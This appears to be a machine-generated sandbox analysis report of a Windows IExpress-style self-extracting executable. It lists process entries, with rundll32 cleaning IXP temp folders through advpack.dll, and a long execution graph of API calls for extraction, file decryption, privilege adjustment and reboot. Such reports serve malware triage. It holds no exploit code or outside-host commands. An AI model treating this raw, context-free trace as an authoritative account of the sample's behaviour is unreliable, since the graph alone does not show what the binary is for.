                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                          Imagebase:0x7ff630c50000
                                                                                                                                                                                                                                          File size:69632 bytes
                                                                                                                                                                                                                                          MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                                          Target ID:14
                                                                                                                                                                                                                                          Start time:02:32:21
                                                                                                                                                                                                                                          Start date:19/02/2023
                                                                                                                                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                          Imagebase:0x7ff630c50000
                                                                                                                                                                                                                                          File size:69632 bytes
                                                                                                                                                                                                                                          MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                            Execution Coverage:28.7%
                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                            Signature Coverage:30.7%
                                                                                                                                                                                                                                            Total number of Nodes:962
                                                                                                                                                                                                                                            Total number of Limit Nodes:25
                                                                                                                                                                                                                                            execution_graph 2196 a44ca0 GlobalAlloc 2197 a46a60 2214 a47155 2197->2214 2199 a46a65 2200 a46a76 GetStartupInfoW 2199->2200 2201 a46a93 2200->2201 2202 a46aa8 2201->2202 2203 a46aaf Sleep 2201->2203 2204 a46ac7 _amsg_exit 2202->2204 2206 a46ad1 2202->2206 2203->2201 2204->2206 2205 a46b13 _initterm 2209 a46b2e __IsNonwritableInCurrentImage 2205->2209 2206->2205 2207 a46af4 2206->2207 2206->2209 2208 a46bd6 _ismbblead 2208->2209 2209->2208 2210 a46c1e 2209->2210 2213 a46bbe exit 2209->2213 2219 a42bfb GetVersion 2209->2219 2210->2207 2211 a46c27 _cexit 2210->2211 2211->2207 2213->2209 2215 a4717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2214->2215 2216 a4717a 2214->2216 2218 a471cd 2215->2218 2216->2215 2217 a471e2 2216->2217 2217->2199 2218->2217 2220 a42c50 2219->2220 2221 a42c0f 2219->2221 2236 a42caa memset memset memset 2220->2236 2221->2220 2223 a42c13 GetModuleHandleW 2221->2223 2223->2220 2225 a42c22 GetProcAddress 2223->2225 2225->2220 2233 a42c34 2225->2233 2226 a42c8e 2228 a42c97 CloseHandle 2226->2228 2229 a42c9e 2226->2229 2228->2229 2229->2209 2233->2220 2234 a42c89 2330 a41f90 2234->2330 2347 a4468f FindResourceA SizeofResource 2236->2347 2239 a42ef3 2242 a444b9 20 API calls 2239->2242 2240 a42d2d CreateEventA SetEvent 2241 a4468f 7 API calls 2240->2241 2243 a42d57 2241->2243 2244 a42d6e 2242->2244 2245 a42d5b 2243->2245 2247 a42e1f 2243->2247 2250 a4468f 7 API calls 2243->2250 2352 a46ce0 2244->2352 2357 a444b9 2245->2357 2386 a45c9e 2247->2386 2249 a42c62 2249->2226 2277 a42f1d 2249->2277 2253 a42d9f 2250->2253 2253->2245 2256 a42da3 CreateMutexA 2253->2256 2254 a42e30 2254->2239 2255 a42e3a 2257 a42e52 FindResourceA 2255->2257 2258 a42e43 2255->2258 2256->2247 2259 a42dbd GetLastError 2256->2259 2262 a42e64 LoadResource 2257->2262 2263 a42e6e 2257->2263 2412 a42390 2258->2412 2259->2247 2261 a42dca 2259->2261 2265 a42dd5 2261->2265 2266 a42dea 2261->2266 2262->2263 2264 a42e4d 2263->2264 2427 a436ee GetVersionExA 2263->2427 2264->2244 2267 a444b9 20 API calls 2265->2267 2268 a444b9 20 API calls 2266->2268 2269 a42de8 2267->2269 2270 a42dff 2268->2270 2272 a42e04 CloseHandle 2269->2272 2270->2247 2270->2272 2272->2244 2278 a42f6c 2277->2278 2279 a42f3f 2277->2279 2571 a45164 2278->2571 2281 a42f5f 2279->2281 2552 a451e5 2279->2552 2699 a43a3f 2281->2699 2283 a42f71 2287 a4303c 2283->2287 2584 a455a0 2283->2584 2289 a46ce0 4 API calls 2287->2289 2291 a42c6b 2289->2291 2317 a452b6 2291->2317 2292 a42f86 GetSystemDirectoryA 2293 a4658a CharPrevA 2292->2293 2294 a42fab LoadLibraryA 2293->2294 2295 a42ff7 FreeLibrary 2294->2295 2296 a42fc0 GetProcAddress 2294->2296 2297 a43006 2295->2297 2298 a43017 SetCurrentDirectoryA 2295->2298 2296->2295 2299 a42fd6 DecryptFileA 2296->2299 2297->2298 2632 a4621e GetWindowsDirectoryA 2297->2632 2300 a43054 2298->2300 2301 a43026 2298->2301 2299->2295 2306 a42ff0 2299->2306 2303 a43061 2300->2303 2642 a43b26 2300->2642 2305 a444b9 20 API calls 2301->2305 2303->2287 2308 a4307a 2303->2308 2651 a4256d 2303->2651 2310 a43037 2305->2310 2306->2295 2312 a43098 2308->2312 2662 a43ba2 2308->2662 2718 a46285 GetLastError 2310->2718 2312->2287 2314 a430af 2312->2314 2720 a44169 2314->2720 2318 a452d6 2317->2318 2326 a45316 2317->2326 2320 a45300 LocalFree LocalFree 2318->2320 2322 a452eb SetFileAttributesA DeleteFileA 2318->2322 2319 a45374 2321 a4538c 2319->2321 3050 a41fe1 2319->3050 2320->2318 2320->2326 2323 a46ce0 4 API calls 2321->2323 2322->2320 2325 a42c72 2323->2325 2325->2226 2325->2234 2326->2319 2327 a4535e SetCurrentDirectoryA 2326->2327 2328 a465e8 4 API calls 2326->2328 2329 a42390 13 API calls 2327->2329 2328->2327 2329->2319 2331 a41f9f 2330->2331 2332 a41f9a 2330->2332 2334 a41fc0 2331->2334 2335 a444b9 20 API calls 2331->2335 2338 a41fd9 2331->2338 2333 a41ea7 15 API calls 2332->2333 2333->2331 2336 a41fcf ExitWindowsEx 2334->2336 2337 a41ee2 GetCurrentProcess OpenProcessToken 2334->2337 2334->2338 2335->2334 2336->2338 2340 a41f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2337->2340 2341 a41f0e 2337->2341 2338->2226 2340->2341 2342 a41f6b ExitWindowsEx 2340->2342 2344 a444b9 20 API calls 2341->2344 2342->2341 2343 a41f1f 2342->2343 2345 a46ce0 4 API calls 2343->2345 2344->2343 2346 a41f8c 2345->2346 2346->2226 2348 a446b6 2347->2348 2349 a42d1a 2347->2349 2348->2349 2350 a446be FindResourceA LoadResource LockResource 2348->2350 2349->2239 2349->2240 2350->2349 2351 a446df memcpy_s FreeResource 2350->2351 2351->2349 2353 a46ce8 2352->2353 2354 a46ceb 2352->2354 2353->2249 2469 a46cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2354->2469 2356 a46e26 2356->2249 2358 a444fe LoadStringA 2357->2358 2359 a4455a 2357->2359 2360 a44527 2358->2360 2361 a44562 2358->2361 2362 a46ce0 4 API calls 2359->2362 2363 a4681f 10 API calls 2360->2363 2367 a445c9 2361->2367 2373 a4457e 2361->2373 2365 a44689 2362->2365 2364 a4452c 2363->2364 2366 a44536 MessageBoxA 2364->2366 2482 a467c9 2364->2482 2365->2244 2366->2359 2369 a44607 LocalAlloc 2367->2369 2370 a445cd LocalAlloc 2367->2370 2369->2359 2381 a445c4 2369->2381 2370->2359 2374 a445f3 2370->2374 2373->2373 2376 a44596 LocalAlloc 2373->2376 2377 a4171e _vsnprintf 2374->2377 2375 a4462d MessageBeep 2470 a4681f 2375->2470 2376->2359 2379 a445af 2376->2379 2377->2381 2488 a4171e 2379->2488 2381->2375 2382 a44645 MessageBoxA LocalFree 2382->2359 2384 a467c9 EnumResourceLanguagesA 2384->2382 2392 a45e17 2386->2392 2396 a45cc3 2386->2396 2387 a45dd0 2391 a45dec GetModuleFileNameA 2387->2391 2387->2392 2388 a46ce0 4 API calls 2390 a42e2c 2388->2390 2389 a45ced CharNextA 2389->2396 2390->2254 2390->2255 2391->2392 2393 a45e0a 2391->2393 2392->2388 2498 a466c8 2393->2498 2395 a46218 2507 a46e2a 2395->2507 2396->2387 2396->2389 2396->2392 2396->2395 2399 a45e36 CharUpperA 2396->2399 2405 a45f9f CharUpperA 2396->2405 2406 a45f59 CompareStringA 2396->2406 2407 a46003 CharUpperA 2396->2407 2408 a4667f IsDBCSLeadByte CharNextA 2396->2408 2409 a45edc CharUpperA 2396->2409 2410 a460a2 CharUpperA 2396->2410 2503 a4658a 2396->2503 2399->2396 2400 a461d0 2399->2400 2401 a444b9 20 API calls 2400->2401 2402 a461e7 2401->2402 2403 a461f7 ExitProcess 2402->2403 2404 a461f0 CloseHandle 2402->2404 2404->2403 2405->2396 2406->2396 2407->2396 2408->2396 2409->2396 2410->2396 2413 a424cb 2412->2413 2416 a423b9 2412->2416 2414 a46ce0 4 API calls 2413->2414 2415 a424dc 2414->2415 2415->2264 2416->2413 2417 a423e9 FindFirstFileA 2416->2417 2417->2413 2418 a42407 2417->2418 2419 a42421 lstrcmpA 2418->2419 2420 a42479 2418->2420 2422 a424a9 FindNextFileA 2418->2422 2425 a4658a CharPrevA 2418->2425 2426 a42390 5 API calls 2418->2426 2421 a42431 lstrcmpA 2419->2421 2419->2422 2424 a42488 SetFileAttributesA DeleteFileA 2420->2424 2421->2418 2421->2422 2422->2418 2423 a424bd FindClose RemoveDirectoryA 2422->2423 2423->2413 2424->2422 2425->2418 2426->2418 2432 a43737 2427->2432 2434 a4372d 2427->2434 2428 a444b9 20 API calls 2429 a439fc 2428->2429 2430 a46ce0 4 API calls 2429->2430 2431 a42e92 2430->2431 2431->2244 2431->2264 2442 a418a3 2431->2442 2432->2429 2432->2434 2435 a438a4 2432->2435 2514 a428e8 2432->2514 2434->2428 2434->2429 2435->2429 2435->2434 2436 a439c1 MessageBeep 2435->2436 2437 a4681f 10 API calls 2436->2437 2438 a439ce 2437->2438 2439 a439d8 MessageBoxA 2438->2439 2440 a467c9 EnumResourceLanguagesA 2438->2440 2439->2429 2440->2439 2443 a418d5 2442->2443 2444 a419b8 2442->2444 2543 a417ee LoadLibraryA 2443->2543 2446 a46ce0 4 API calls 2444->2446 2448 a419d5 2446->2448 2448->2264 2462 a46517 FindResourceA 2448->2462 2449 a418e5 GetCurrentProcess OpenProcessToken 2449->2444 2450 a41900 GetTokenInformation 2449->2450 2451 a41918 GetLastError 2450->2451 2452 a419aa CloseHandle 2450->2452 2451->2452 2453 a41927 LocalAlloc 2451->2453 2452->2444 2454 a41938 GetTokenInformation 2453->2454 2455 a419a9 2453->2455 2456 a419a2 LocalFree 2454->2456 2457 a4194e AllocateAndInitializeSid 2454->2457 2455->2452 2456->2455 2457->2456 2460 a4196e 2457->2460 2458 a41999 FreeSid 2458->2456 2459 a41975 EqualSid 2459->2460 2461 a4198c 2459->2461 2460->2458 2460->2459 2460->2461 2461->2458 2463 a46536 LoadResource 2462->2463 2464 a4656b 2462->2464 2463->2464 2465 a46544 DialogBoxIndirectParamA FreeResource 2463->2465 2466 a444b9 20 API calls 2464->2466 2465->2464 2468 a4657c 2465->2468 2466->2468 2468->2264 2469->2356 2471 a46857 GetVersionExA 2470->2471 2472 a46940 2470->2472 2473 a4687c 2471->2473 2481 a4691a 2471->2481 2474 a46ce0 4 API calls 2472->2474 2476 a468a5 GetSystemMetrics 2473->2476 2473->2481 2475 a4463b 2474->2475 2475->2382 2475->2384 2477 a468b5 RegOpenKeyExA 2476->2477 2476->2481 2478 a468d6 RegQueryValueExA RegCloseKey 2477->2478 2477->2481 2479 a4690c 2478->2479 2478->2481 2492 a466f9 2479->2492 2481->2472 2483 a46803 2482->2483 2484 a467e2 2482->2484 2483->2366 2496 a46793 EnumResourceLanguagesA 2484->2496 2486 a467f5 2486->2483 2497 a46793 EnumResourceLanguagesA 2486->2497 2489 a4172d 2488->2489 2490 a4175d 2489->2490 2491 a4173d _vsnprintf 2489->2491 2490->2381 2491->2490 2494 a4670f 2492->2494 2493 a46740 CharNextA 2493->2494 2494->2493 2495 a4674b 2494->2495 2495->2481 2496->2486 2497->2483 2499 a466d5 2498->2499 2500 a466f3 2499->2500 2502 a466e5 CharNextA 2499->2502 2510 a46648 2499->2510 2500->2392 2502->2499 2504 a4659b 2503->2504 2504->2504 2505 a465b8 CharPrevA 2504->2505 2506 a465ab 2504->2506 2505->2506 2506->2396 2513 a46cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2507->2513 2509 a4621d 2511 a4665d IsDBCSLeadByte 2510->2511 2512 a46668 2510->2512 2511->2512 2512->2499 2513->2509 2515 a42a62 2514->2515 2519 a4290d 2514->2519 2516 a42a75 2515->2516 2517 a42a6e GlobalFree 2515->2517 2516->2435 2517->2516 2519->2515 2520 a42955 GlobalAlloc 2519->2520 2522 a42a20 GlobalUnlock 2519->2522 2523 a42a80 GlobalUnlock 2519->2523 2524 a42773 2519->2524 2520->2515 2521 a42968 GlobalLock 2520->2521 2521->2515 2521->2519 2522->2519 2523->2515 2525 a428b2 2524->2525 2526 a427a3 CharUpperA CharNextA CharNextA 2524->2526 2527 a428b7 GetSystemDirectoryA 2525->2527 2526->2527 2528 a427db 2526->2528 2531 a428bf 2527->2531 2529 a427e3 2528->2529 2530 a428a8 GetWindowsDirectoryA 2528->2530 2535 a4658a CharPrevA 2529->2535 2530->2531 2532 a428d2 2531->2532 2533 a4658a CharPrevA 2531->2533 2534 a46ce0 4 API calls 2532->2534 2533->2532 2536 a428e2 2534->2536 2537 a42810 RegOpenKeyExA 2535->2537 2536->2519 2537->2531 2538 a42837 RegQueryValueExA 2537->2538 2539 a4285c 2538->2539 2540 a4289a RegCloseKey 2538->2540 2541 a42867 ExpandEnvironmentStringsA 2539->2541 2542 a4287a 2539->2542 2540->2531 2541->2542 2542->2540 2544 a41826 GetProcAddress 2543->2544 2545 a41890 2543->2545 2547 a41889 FreeLibrary 2544->2547 2548 a41839 AllocateAndInitializeSid 2544->2548 2546 a46ce0 4 API calls 2545->2546 2549 a4189f 2546->2549 2547->2545 2548->2547 2551 a4185f FreeSid 2548->2551 2549->2444 2549->2449 2551->2547 2553 a4468f 7 API calls 2552->2553 2554 a451f9 LocalAlloc 2553->2554 2555 a4522d 2554->2555 2556 a4520d 2554->2556 2557 a4468f 7 API calls 2555->2557 2558 a444b9 20 API calls 2556->2558 2559 a4523a 2557->2559 2560 a4521e 2558->2560 2561 a45262 lstrcmpA 2559->2561 2562 a4523e 2559->2562 2563 a46285 GetLastError 2560->2563 2565 a45272 LocalFree 2561->2565 2566 a4527e 2561->2566 2564 a444b9 20 API calls 2562->2564 2568 a42f4d 2563->2568 2567 a4524f LocalFree 2564->2567 2565->2568 2569 a444b9 20 API calls 2566->2569 2567->2568 2568->2278 2568->2281 2568->2287 2570 a45290 LocalFree 2569->2570 2570->2568 2572 a4468f 7 API calls 2571->2572 2573 a45175 2572->2573 2574 a4517a 2573->2574 2575 a451af 2573->2575 2576 a444b9 20 API calls 2574->2576 2577 a4468f 7 API calls 2575->2577 2583 a4518d 2576->2583 2578 a451c0 2577->2578 2733 a46298 2578->2733 2580 a451e1 2580->2283 2582 a444b9 20 API calls 2582->2583 2583->2283 2585 a4468f 7 API calls 2584->2585 2586 a455c7 LocalAlloc 2585->2586 2587 a455fd 2586->2587 2588 a455db 2586->2588 2589 a4468f 7 API calls 2587->2589 2590 a444b9 20 API calls 2588->2590 2592 a4560a 2589->2592 2591 a455ec 2590->2591 2593 a46285 GetLastError 2591->2593 2594 a45632 lstrcmpA 2592->2594 2595 a4560e 2592->2595 2621 a455f1 2593->2621 2597 a45645 2594->2597 2598 a4564b LocalFree 2594->2598 2596 a444b9 20 API calls 2595->2596 2599 a4561f LocalFree 2596->2599 2597->2598 2600 a45696 2598->2600 2601 a4565b 2598->2601 2599->2621 2602 a4589f 2600->2602 2605 a456ae GetTempPathA 2600->2605 2606 a45467 49 API calls 2601->2606 2603 a46517 24 API calls 2602->2603 2603->2621 2604 a46ce0 4 API calls 2607 a42f7e 2604->2607 2608 a456eb 2605->2608 2609 a456c3 2605->2609 2610 a45678 2606->2610 2607->2287 2607->2292 2614 a45717 GetDriveTypeA 2608->2614 2615 a4586c GetWindowsDirectoryA 2608->2615 2608->2621 2745 a45467 2609->2745 2613 a444b9 20 API calls 2610->2613 2610->2621 2613->2621 2616 a45730 GetFileAttributesA 2614->2616 2630 a4572b 2614->2630 2779 a4597d GetCurrentDirectoryA SetCurrentDirectoryA 2615->2779 2616->2630 2620 a4597d 34 API calls 2620->2630 2621->2604 2622 a45467 49 API calls 2622->2608 2623 a42630 21 API calls 2623->2630 2625 a457c1 GetWindowsDirectoryA 2625->2630 2626 a4658a CharPrevA 2627 a457e8 GetFileAttributesA 2626->2627 2628 a457fa CreateDirectoryA 2627->2628 2627->2630 2628->2630 2629 a45827 SetFileAttributesA 2629->2630 2630->2614 2630->2615 2630->2616 2630->2620 2630->2621 2630->2623 2630->2625 2630->2626 2630->2629 2631 a45467 49 API calls 2630->2631 2775 a46952 2630->2775 2631->2630 2633 a46268 2632->2633 2634 a46249 2632->2634 2636 a4597d 34 API calls 2633->2636 2635 a444b9 20 API calls 2634->2635 2637 a4625a 2635->2637 2638 a4625f 2636->2638 2639 a46285 GetLastError 2637->2639 2640 a46ce0 4 API calls 2638->2640 2639->2638 2641 a43013 2640->2641 2641->2287 2641->2298 2643 a43b2d 2642->2643 2643->2643 2644 a43b72 2643->2644 2645 a43b53 2643->2645 2845 a44fe0 2644->2845 2647 a46517 24 API calls 2645->2647 2648 a43b70 2647->2648 2649 a46298 10 API calls 2648->2649 2650 a43b7b 2648->2650 2649->2650 2650->2303 2652 a42622 2651->2652 2653 a42583 2651->2653 2896 a424e0 GetWindowsDirectoryA 2652->2896 2655 a425e8 RegOpenKeyExA 2653->2655 2656 a4258b 2653->2656 2657 a425e3 2655->2657 2658 a42609 RegQueryInfoKeyA 2655->2658 2656->2657 2659 a4259b RegOpenKeyExA 2656->2659 2657->2308 2660 a425d1 RegCloseKey 2658->2660 2659->2657 2661 a425bc RegQueryValueExA 2659->2661 2660->2657 2661->2660 2663 a43bdb 2662->2663 2679 a43bec 2662->2679 2665 a4468f 7 API calls 2663->2665 2664 a43c03 memset 2664->2679 2665->2679 2666 a4468f 7 API calls 2666->2679 2667 a43d13 2668 a444b9 20 API calls 2667->2668 2674 a43d26 2668->2674 2670 a46ce0 4 API calls 2671 a43f60 2670->2671 2671->2312 2672 a43fd7 2672->2674 2995 a42267 2672->2995 2673 a43d7b CompareStringA 2673->2672 2673->2679 2674->2670 2675 a43fab 2678 a444b9 20 API calls 2675->2678 2683 a43fbe LocalFree 2678->2683 2679->2664 2679->2666 2679->2667 2679->2672 2679->2673 2679->2674 2679->2675 2680 a43f46 LocalFree 2679->2680 2681 a43f1e LocalFree 2679->2681 2685 a43cc7 CompareStringA 2679->2685 2696 a43e10 2679->2696 2904 a41ae8 2679->2904 2945 a4202a memset memset RegCreateKeyExA 2679->2945 2971 a43fef 2679->2971 2680->2674 2681->2672 2681->2679 2683->2674 2685->2679 2686 a43f92 2689 a444b9 20 API calls 2686->2689 2687 a43e1f GetProcAddress 2688 a43f64 2687->2688 2687->2696 2690 a444b9 20 API calls 2688->2690 2691 a43fa9 2689->2691 2692 a43f75 FreeLibrary 2690->2692 2693 a43f7c LocalFree 2691->2693 2692->2693 2694 a46285 GetLastError 2693->2694 2695 a43f8b 2694->2695 2695->2674 2696->2686 2696->2687 2697 a43f40 FreeLibrary 2696->2697 2698 a43eff FreeLibrary 2696->2698 2985 a46495 2696->2985 2697->2680 2698->2681 2700 a4468f 7 API calls 2699->2700 2701 a43a55 LocalAlloc 2700->2701 2702 a43a6c 2701->2702 2703 a43a8e 2701->2703 2705 a444b9 20 API calls 2702->2705 2704 a4468f 7 API calls 2703->2704 2706 a43a98 2704->2706 2707 a43a7d 2705->2707 2708 a43ac5 lstrcmpA 2706->2708 2709 a43a9c 2706->2709 2710 a46285 GetLastError 2707->2710 2712 a43b0d LocalFree 2708->2712 2713 a43ada 2708->2713 2711 a444b9 20 API calls 2709->2711 2714 a42f64 2710->2714 2715 a43aad LocalFree 2711->2715 2712->2714 2716 a46517 24 API calls 2713->2716 2714->2278 2714->2287 2715->2714 2717 a43aec LocalFree 2716->2717 2717->2714 2719 a4628f 2718->2719 2719->2287 2721 a4468f 7 API calls 2720->2721 2722 a4417d LocalAlloc 2721->2722 2723 a44195 2722->2723 2724 a441a8 2722->2724 2726 a444b9 20 API calls 2723->2726 2725 a4468f 7 API calls 2724->2725 2727 a441b5 2725->2727 2728 a441a6 2726->2728 2729 a441c5 lstrcmpA 2727->2729 2730 a441b9 2727->2730 2728->2287 2729->2730 2731 a441e6 LocalFree 2729->2731 2732 a444b9 20 API calls 2730->2732 2731->2728 2732->2731 2734 a4171e _vsnprintf 2733->2734 2744 a462c9 FindResourceA 2734->2744 2736 a462cb LoadResource LockResource 2737 a46353 2736->2737 2740 a462e0 2736->2740 2738 a46ce0 4 API calls 2737->2738 2739 a451ca 2738->2739 2739->2580 2739->2582 2741 a46355 FreeResource 2740->2741 2742 a4631b FreeResource 2740->2742 2741->2737 2743 a4171e _vsnprintf 2742->2743 2743->2744 2744->2736 2744->2737 2746 a4548a 2745->2746 2763 a4551a 2745->2763 2805 a453a1 2746->2805 2748 a45581 2752 a46ce0 4 API calls 2748->2752 2751 a45495 2751->2748 2755 a454c2 GetSystemInfo 2751->2755 2756 a4550c 2751->2756 2757 a4559a 2752->2757 2753 a4554d 2753->2748 2762 a4597d 34 API calls 2753->2762 2754 a4553b CreateDirectoryA 2758 a45577 2754->2758 2759 a45547 2754->2759 2765 a454da 2755->2765 2760 a4658a CharPrevA 2756->2760 2757->2621 2769 a42630 GetWindowsDirectoryA 2757->2769 2761 a46285 GetLastError 2758->2761 2759->2753 2760->2763 2764 a4557c 2761->2764 2766 a4555c 2762->2766 2816 a458c8 2763->2816 2764->2748 2765->2756 2767 a4658a CharPrevA 2765->2767 2766->2748 2768 a45568 RemoveDirectoryA 2766->2768 2767->2756 2768->2748 2770 a4265e 2769->2770 2771 a4266f 2769->2771 2772 a444b9 20 API calls 2770->2772 2773 a46ce0 4 API calls 2771->2773 2772->2771 2774 a42687 2773->2774 2774->2608 2774->2622 2776 a469a1 2775->2776 2777 a4696e GetDiskFreeSpaceA 2775->2777 2776->2630 2777->2776 2778 a46989 MulDiv 2777->2778 2778->2776 2780 a459dd GetDiskFreeSpaceA 2779->2780 2781 a459bb 2779->2781 2783 a45ba1 memset 2780->2783 2784 a45a21 MulDiv 2780->2784 2782 a444b9 20 API calls 2781->2782 2785 a459cc 2782->2785 2786 a46285 GetLastError 2783->2786 2784->2783 2787 a45a50 GetVolumeInformationA 2784->2787 2788 a46285 GetLastError 2785->2788 2789 a45bbc GetLastError FormatMessageA 2786->2789 2790 a45ab5 SetCurrentDirectoryA 2787->2790 2791 a45a6e memset 2787->2791 2792 a459d1 2788->2792 2793 a45be3 2789->2793 2800 a45acc 2790->2800 2794 a46285 GetLastError 2791->2794 2798 a46ce0 4 API calls 2792->2798 2795 a444b9 20 API calls 2793->2795 2796 a45a89 GetLastError FormatMessageA 2794->2796 2797 a45bf5 SetCurrentDirectoryA 2795->2797 2796->2793 2797->2792 2799 a45c11 2798->2799 2799->2608 2801 a45b20 2800->2801 2802 a45b0a 2800->2802 2801->2792 2828 a4268b 2801->2828 2803 a444b9 20 API calls 2802->2803 2803->2792 2807 a453bf 2805->2807 2806 a4171e _vsnprintf 2806->2807 2807->2806 2808 a4658a CharPrevA 2807->2808 2811 a45415 GetTempFileNameA 2807->2811 2809 a453fa RemoveDirectoryA GetFileAttributesA 2808->2809 2809->2807 2810 a4544f CreateDirectoryA 2809->2810 2810->2811 2812 a4543a 2810->2812 2811->2812 2813 a45429 DeleteFileA CreateDirectoryA 2811->2813 2814 a46ce0 4 API calls 2812->2814 2813->2812 2815 a45449 2814->2815 2815->2751 2817 a458d8 2816->2817 2817->2817 2818 a458df LocalAlloc 2817->2818 2819 a458f3 2818->2819 2820 a45919 2818->2820 2821 a444b9 20 API calls 2819->2821 2823 a4658a CharPrevA 2820->2823 2826 a45906 2821->2826 2822 a46285 GetLastError 2827 a45534 2822->2827 2824 a45931 CreateFileA LocalFree 2823->2824 2825 a4595b CloseHandle GetFileAttributesA 2824->2825 2824->2826 2825->2826 2826->2822 2826->2827 2827->2753 2827->2754 2829 a426e5 2828->2829 2830 a426b9 2828->2830 2831 a4271f 2829->2831 2832 a426ea 2829->2832 2833 a4171e _vsnprintf 2830->2833 2835 a426e3 2831->2835 2838 a4171e _vsnprintf 2831->2838 2834 a4171e _vsnprintf 2832->2834 2836 a426cc 2833->2836 2837 a426fd 2834->2837 2839 a46ce0 4 API calls 2835->2839 2840 a444b9 20 API calls 2836->2840 2841 a444b9 20 API calls 2837->2841 2842 a42735 2838->2842 2843 a4276d 2839->2843 2840->2835 2841->2835 2844 a444b9 20 API calls 2842->2844 2843->2792 2844->2835 2846 a4468f 7 API calls 2845->2846 2847 a44ff5 FindResourceA LoadResource LockResource 2846->2847 2848 a45020 2847->2848 2861 a4515f 2847->2861 2849 a45057 2848->2849 2850 a45029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2848->2850 2864 a44efd 2849->2864 2850->2849 2853 a45060 2855 a444b9 20 API calls 2853->2855 2854 a4507c 2856 a45075 2854->2856 2857 a444b9 20 API calls 2854->2857 2855->2856 2858 a45110 FreeResource 2856->2858 2859 a4511d 2856->2859 2857->2856 2858->2859 2860 a4513a 2859->2860 2863 a444b9 20 API calls 2859->2863 2860->2861 2862 a4514c SendMessageA 2860->2862 2861->2648 2862->2861 2863->2860 2865 a44f4a 2864->2865 2866 a44fa1 2865->2866 2872 a44980 2865->2872 2868 a46ce0 4 API calls 2866->2868 2869 a44fc6 2868->2869 2869->2853 2869->2854 2873 a44990 2872->2873 2874 a449a5 2873->2874 2875 a449c2 lstrcmpA 2873->2875 2876 a444b9 20 API calls 2874->2876 2877 a449ba 2875->2877 2878 a44a0e 2875->2878 2876->2877 2877->2866 2880 a44b60 2877->2880 2878->2877 2883 a4487a 2878->2883 2881 a44b92 FindCloseChangeNotification 2880->2881 2882 a44b76 2880->2882 2881->2882 2882->2866 2884 a448a2 CreateFileA 2883->2884 2886 a44908 2884->2886 2887 a448e9 2884->2887 2886->2877 2887->2886 2888 a448ee 2887->2888 2891 a4490c 2888->2891 2892 a448f5 CreateFileA 2891->2892 2894 a44917 2891->2894 2892->2886 2893 a44962 CharNextA 2893->2894 2894->2892 2894->2893 2895 a44953 CreateDirectoryA 2894->2895 2895->2893 2897 a42510 2896->2897 2898 a4255b 2896->2898 2899 a4658a CharPrevA 2897->2899 2900 a46ce0 4 API calls 2898->2900 2901 a42522 WritePrivateProfileStringA _lopen 2899->2901 2902 a42569 2900->2902 2901->2898 2903 a42548 _llseek _lclose 2901->2903 2902->2657 2903->2898 2905 a41b25 2904->2905 3009 a41a84 2905->3009 2907 a41b57 2908 a4658a CharPrevA 2907->2908 2910 a41b8c 2907->2910 2908->2910 2909 a466c8 2 API calls 2911 a41bd1 2909->2911 2910->2909 2912 a41d73 2911->2912 2913 a41bd9 CompareStringA 2911->2913 2915 a466c8 2 API calls 2912->2915 2913->2912 2914 a41bf7 GetFileAttributesA 2913->2914 2916 a41d53 2914->2916 2917 a41c0d 2914->2917 2918 a41d7d 2915->2918 2919 a41d64 2916->2919 2917->2916 2924 a41a84 2 API calls 2917->2924 2920 a41d81 CompareStringA 2918->2920 2921 a41df8 LocalAlloc 2918->2921 2922 a444b9 20 API calls 2919->2922 2920->2921 2929 a41d9b 2920->2929 2921->2919 2923 a41e0b GetFileAttributesA 2921->2923 2925 a41d6c 2922->2925 2926 a41e1d 2923->2926 2943 a41e45 2923->2943 2927 a41c31 2924->2927 2931 a46ce0 4 API calls 2925->2931 2926->2943 2928 a41c50 LocalAlloc 2927->2928 2933 a41a84 2 API calls 2927->2933 2928->2919 2930 a41c67 GetPrivateProfileIntA GetPrivateProfileStringA 2928->2930 2929->2929 2932 a41dbe LocalAlloc 2929->2932 2938 a41cf8 2930->2938 2942 a41cc2 2930->2942 2936 a41ea1 2931->2936 2932->2919 2937 a41de1 2932->2937 2933->2928 2936->2679 2939 a4171e _vsnprintf 2937->2939 2940 a41d23 2938->2940 2941 a41d09 GetShortPathNameA 2938->2941 2939->2942 2944 a4171e _vsnprintf 2940->2944 2941->2940 2942->2925 3015 a42aac 2943->3015 2944->2942 2946 a42256 2945->2946 2947 a4209a 2945->2947 2948 a46ce0 4 API calls 2946->2948 2950 a4171e _vsnprintf 2947->2950 2952 a420dc 2947->2952 2949 a42263 2948->2949 2949->2679 2951 a420af RegQueryValueExA 2950->2951 2951->2947 2951->2952 2953 a420e4 RegCloseKey 2952->2953 2954 a420fb GetSystemDirectoryA 2952->2954 2953->2946 2955 a4658a CharPrevA 2954->2955 2956 a4211b LoadLibraryA 2955->2956 2957 a4212e GetProcAddress FreeLibrary 2956->2957 2958 a42179 GetModuleFileNameA 2956->2958 2957->2958 2959 a4214e GetSystemDirectoryA 2957->2959 2960 a421de RegCloseKey 2958->2960 2962 a42177 